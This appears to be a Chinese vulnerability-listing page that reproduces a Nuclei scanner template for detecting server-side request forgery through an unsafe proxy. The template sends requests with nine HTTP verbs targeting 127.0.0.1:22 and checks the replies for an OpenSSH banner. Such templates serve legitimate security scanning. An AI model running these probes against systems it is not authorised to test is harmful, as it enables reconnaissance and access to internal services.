ssrf-via-proxy: SSRF via Proxy Unsafe

日期: 2025-08-01 | 影响软件: ssrf-via-proxy | POC: 已公开

漏洞描述

PoC代码[已公开]

id: ssrf-via-proxy

info:
  name: SSRF via Proxy Unsafe
  author: geeknik,petergrifin
  severity: unknown
  reference:
    - https://github.com/geeknik/the-nuclei-templates/blob/main/ssrf-by-proxy.yaml
    - https://twitter.com/HusseiN98D/status/1649006265450782720
    - https://twitter.com/ImoJOnDz/status/1649089777629827072
  metadata:
    max-request: 9
  tags: ssrf,proxy,oast,fuzz,fuzzing,vuln

http:
  - payloads:
      verb:
        - GET
        - HEAD
        - POST
        - PUT
        - DELETE
        - CONNECT
        - OPTIONS
        - TRACE
        - PATCH
    raw:
      - |+
        {{verb}} http://127.0.0.1:22 HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    unsafe: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Protocol mismatch"
          - "OpenSSH"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022064cf1b249bf50c50a62098e075f67bff5db266d0d0263f08a6e91ba01ada44b6022100bb5ed1aae508cdf7f1c0951d01fea54f78779ae4097d084cabd865847bb2f3a3:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/fuzzing/ssrf-via-proxy.yaml